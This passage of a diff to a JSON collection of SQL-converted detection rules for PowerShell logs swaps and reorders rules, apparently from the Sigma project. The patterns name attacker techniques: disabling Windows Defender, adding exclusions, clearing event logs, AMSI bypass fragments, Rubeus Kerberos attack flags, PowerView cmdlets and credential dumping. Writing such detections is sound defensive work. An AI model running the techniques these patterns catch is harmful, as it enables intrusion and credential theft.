that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", + "author": "frack113, elhoim, Tim Shelton (fps, alias support)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1562.001" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_using_set_service_to_hide_services.yml" + "filename": "posh_ps_tamper_defender.yml" }, { - "title": "Powershell Install a DLL in System Directory", - "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", + "title": "Suspicious Eventlog Clear", + "id": "0f017df3-8f5a-414f-ad6b-24aff1128278", "status": "experimental", - "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556.002" + "attack.defense_evasion", + "attack.t1070.001" ], "falsepositives": [ - "Unknown" + "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Clear-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Limit-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Clear-WinEvent %' ESCAPE '\\'))" ], - "filename": "posh_ps_copy_item_system_directory.yml" + "filename": "posh_ps_susp_clear_eventlog.yml" }, { - "title": "Windows Firewall Profile Disabled", - "id": "488b44e7-3781-4a71-888d-c95abfacf44d", - "status": "experimental", - "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", - "author": "Austin Songer @austinsonger", + "title": "Suspicious Invoke-Item From Mount-DiskImage", + "id": "902cedee-0398-4e3a-8183-6f3a89773a96", + "status": "test", + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1553.005" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Enabled %' ESCAPE '\\' AND ScriptBlockText LIKE '% False%' ESCAPE '\\' AND (ScriptBlockText LIKE '% -All %' ESCAPE '\\' OR ScriptBlockText LIKE '%Public%' ESCAPE '\\' OR ScriptBlockText LIKE '%Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Private%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-Volume%' ESCAPE '\\' AND ScriptBlockText LIKE '%.DriveLetter%' ESCAPE '\\' AND ScriptBlockText LIKE '%invoke-item %' ESCAPE '\\' AND ScriptBlockText LIKE '%):\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_windows_firewall_profile_disabled.yml" + "filename": "posh_ps_run_from_mount_diskimage.yml" + }, + { + "title": "Manipulation of User Computer or Group Security Principals Across AD", + "id": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", + "status": "test", + "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", + "author": "frack113", + "tags": [ + "attack.persistence", + "attack.t1136.002" + ], + "falsepositives": [ + "Legitimate administrative script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.DirectoryServices.AccountManagement%' ESCAPE '\\')" + ], + "filename": "posh_ps_directoryservices_accountmanagement.yml" }, { - "title": "Powershell Sensitive File Discovery", - "id": "7d416556-6502-45b2-9bad-9d2f05f38997", - "status": "experimental", - "description": "Detect adversaries enumerate sensitive files", - "author": "frack113", + "title": "Dnscat Execution", + "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "status": "test", + "description": "Dnscat exfiltration tool execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.exfiltration", + "attack.t1048", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.pass%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdbx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" ], - "filename": "posh_ps_sensitive_file_discovery.yml" + "filename": "posh_ps_dnscat_execution.yml" }, { - "title": "Dump Credentials from Windows Credential Manager With PowerShell", - "id": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", + "title": "Remove Account From Domain Admin Group", + "id": "48a45d45-8112-416b-8a67-46e03a4b2107", "status": "test", - "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.impact", + "attack.t1531" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-PasswordVaultCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CredManCreds%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Windows.Security.Credentials.PasswordVault%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.CSharp.CSharpCodeProvider%' ESCAPE '\\' AND ScriptBlockText LIKE '%[System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())%' ESCAPE '\\' AND ScriptBlockText LIKE '%Collections.ArrayList%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.CodeDom.Compiler.CompilerParameters%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-ADGroupMember%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Identity %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Members %' ESCAPE '\\')" ], - "filename": "posh_ps_dump_password_windows_credential_manager.yml" + "filename": "posh_ps_susp_remove_adgroupmember.yml" }, { - "title": "Powershell Directory Enumeration", - "id": "162e69a7-7981-4344-84a9-0f1c9a217a52", - "status": "test", - "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", + "title": "Suspicious GetTypeFromCLSID ShellExecute", + "id": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", + "status": "experimental", + "description": "Detects suspicious Powershell code that execute COM Objects", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%foreach%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ErrorAction %' ESCAPE '\\' AND ScriptBlockText LIKE '%SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '%Out-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-append%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%::GetTypeFromCLSID(%' ESCAPE '\\' AND ScriptBlockText LIKE '%.ShellExecute(%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_directory_enum.yml" + "filename": "posh_ps_susp_gettypefromclsid.yml" }, { - "title": "Suspicious PowerShell WindowStyle Option", - "id": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", - "status": "test", - "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", - "author": "frack113, Tim Shelton (fp AWS)", - "tags": [ - "attack.defense_evasion", - "attack.t1564.003" - ], + "title": "Suspicious X509Enrollment - Ps Script", + "id": "504d63cb-0dba-4d02-8531-e72981aace2c", + "status": "experimental", + "description": "Detect use of X509Enrollment", + "author": "frack113", "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%WindowStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%Hidden%' ESCAPE '\\') AND NOT (ScriptBlockText LIKE '%:\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%$PSScriptRoot\\\\Module\\\\WorkspaceScriptModule\\\\WorkspaceScriptModule%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR ScriptBlockText LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_windowstyle.yml" + "filename": "posh_ps_x509enrollment.yml" }, { - "title": "Get-ADUser Enumeration Using UserAccountControl Flags", - "id": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", - "status": "test", - "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", - "author": "frack113", + "title": "HackTool - Rubeus Execution - ScriptBlock", + "id": "3245cd30-e015-40ff-a31d-5cadd5f377ec", + "status": "experimental", + "description": "Detects the execution of the hacktool Rubeus using specific command line flags", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\' AND ScriptBlockText LIKE '%useraccountcontrol%' ESCAPE '\\' AND ScriptBlockText LIKE '%-band%' ESCAPE '\\' AND ScriptBlockText LIKE '%4194304%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%asreproast %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /luid:0x%' ESCAPE '\\' OR ScriptBlockText LIKE '%kerberoast %' ESCAPE '\\' OR ScriptBlockText LIKE '%createnetonly /program:%' ESCAPE '\\' OR ScriptBlockText LIKE '%ptt /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%/impersonateuser:%' ESCAPE '\\' OR ScriptBlockText LIKE '%renew /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%asktgt /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%harvest /interval:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%hash /password:%' ESCAPE '\\' OR ScriptBlockText LIKE '%golden /aes256:%' ESCAPE '\\' OR ScriptBlockText LIKE '%silver /user:%' ESCAPE '\\'))" ], - "filename": "posh_ps_as_rep_roasting.yml" + "filename": "posh_ps_hktl_rubeus.yml" }, { - "title": "Powershell Detect Virtualization Environment", - "id": "d93129cd-1ee0-479f-bc03-ca6f129882e3", - "status": "test", - "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", - "author": "frack113, Duc.Le-GTSC", + "title": "Windows Defender Exclusions Added - PowerShell", + "id": "c1344fa2-323b-4d2e-9176-84b4d4821c88", + "status": "experimental", + "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", + "author": "Tim Rauch", "tags": [ "attack.defense_evasion", - "attack.t1497.001" + "attack.t1562", + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND (ScriptBlockText LIKE '%MSAcpi\\_ThermalZoneTemperature%' ESCAPE '\\' OR ScriptBlockText LIKE '%Win32\\_ComputerSystem%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -ExclusionPath %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionExtension %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionProcess %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionIpAddress %' ESCAPE '\\') AND (ScriptBlockText LIKE '%Add-MpPreference %' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MpPreference %' ESCAPE '\\'))" ], - "filename": "posh_ps_detect_vm_env.yml" + "filename": "posh_ps_win_defender_exclusions_added.yml" }, { - "title": "AMSI Bypass Pattern Assembly GetType", - "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", - "status": "experimental", - "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", - "author": "Florian Roth (Nextron Systems)", + "title": "Malicious PowerView PowerShell Commandlets", + "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "status": "test", + "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Should not be any as administrators do not use this tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" ], - "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" + "filename": "posh_ps_powerview_malicious_commandlets.yml" }, { - "title": "Remove Account From Domain Admin Group", - "id": "48a45d45-8112-416b-8a67-46e03a4b2107", + "title": "Powershell WMI Persistence", + "id": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", "status": "test", - "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", + "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", "author": "frack113", "tags": [ - "attack.impact", - "attack.t1531" + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-ADGroupMember%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Identity %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Members %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName \\_\\_EventFilter %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName CommandLineEventConsumer %' ESCAPE '\\' AND 